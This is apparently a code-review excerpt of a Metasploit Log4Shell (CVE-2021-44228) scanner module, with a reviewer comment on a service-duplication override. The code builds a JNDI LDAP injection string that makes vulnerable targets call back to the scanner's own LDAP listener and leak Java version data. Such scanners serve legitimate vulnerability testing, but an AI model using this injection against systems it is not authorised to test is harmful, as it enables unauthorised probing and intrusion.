modules/auxiliary/scanner/http/log4shell_scanner.rb

```diff
@@ -0,0 +1,193 @@
+      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
+      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
+      OptPath.new('HEADERS_FILE', [
+        false, 'File containing headers to check',
+        File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')
+      ]),
+      OptPath.new('URIS_FILE', [ false, 'File containing additional URIs to check' ]),
+      OptInt.new('TIMEOUT', [ true, 'Time to wait to receive LDAP connections', 5 ])
+    ])
+  end
+
+  def jndi_string(resource)
+    "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}/${sys:java.vendor}_${sys:java.version}}"
+  end
+
+  def on_client_connect(client)
+    client.extend(Net::BER::BERParser)
+    pdu = Net::LDAP::PDU.new(client.read_ber(Net::LDAP::AsnSyntax))
+    return unless pdu.app_tag == Net::LDAP::PDU::BindRequest
+
+    response = [
+      pdu.message_id.to_ber,
+      [
+        Net::LDAP::ResultCodeSuccess.to_ber_enumerated, ''.to_ber, ''.to_ber
+      ].to_ber_appsequence(Net::LDAP::PDU::BindResult)
+    ].to_ber_sequence
+    client.write(response)
+
+    pdu = Net::LDAP::PDU.new(client.read_ber(Net::LDAP::AsnSyntax))
+    return unless pdu.app_tag == Net::LDAP::PDU::SearchRequest
+
+    base_object = pdu.search_parameters[:base_object].to_s
+    token, java_version = base_object.split('/', 2)
+
+    unless (context = @tokens.delete(token)).nil?
+      details = normalize_uri(context[:target_uri]).to_s
+      details << " (header: #{context[:headers].keys.first})" unless context[:headers].nil?
+      details << " (java: #{java_version})" unless java_version.blank?
+      peerinfo = "#{context[:rhost]}:#{context[:rport]}"
+      print_good("#{peerinfo.ljust(21)} - Log4Shell found via #{details}")
+      report_vuln(
+        host: context[:rhost],
+        port: context[:rport],
+        info: "Module #{fullname} detected Log4Shell vulnerability via #{details}",
+        name: name,
+        refs: references
+      )
+    end
+  rescue Net::LDAP::PDU::Error => e
+    vprint_error("#{peer} - #{e}")
+  ensure
+    service.close_client(client)
+  end
+
+  def rand_text_alpha_lower_numeric(len, bad = '')
+    foo = []
+    foo += ('a'..'z').to_a
+    foo += ('0'..'9').to_a
+    Rex::Text.rand_base(len, bad, *foo)
+  end
+
+  def run
+    fail_with(Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') if ['0.0.0.0', '::'].include?(datastore['SRVHOST'])
+    @tokens = {}
+    # always disable SSL because the LDAP server doesn't use it but the setting is shared with the HTTP requests
+    begin
+      start_service('SSL' => false)
+    rescue Rex::BindFailed => e
+      fail_with(Failure::BadConfig, e.to_s)
+    end
+
+    super
+
+    vprint_status("Sleeping #{datastore['TIMEOUT']} seconds for any last connections")
+    sleep datastore['TIMEOUT']
+  ensure
+    stop_service
+  end
+
+  def replicant
+    # don't duplicate the service
```

Comment:
Add a comment that calls this out as a horrible pattern that should not be duplicated into new modules.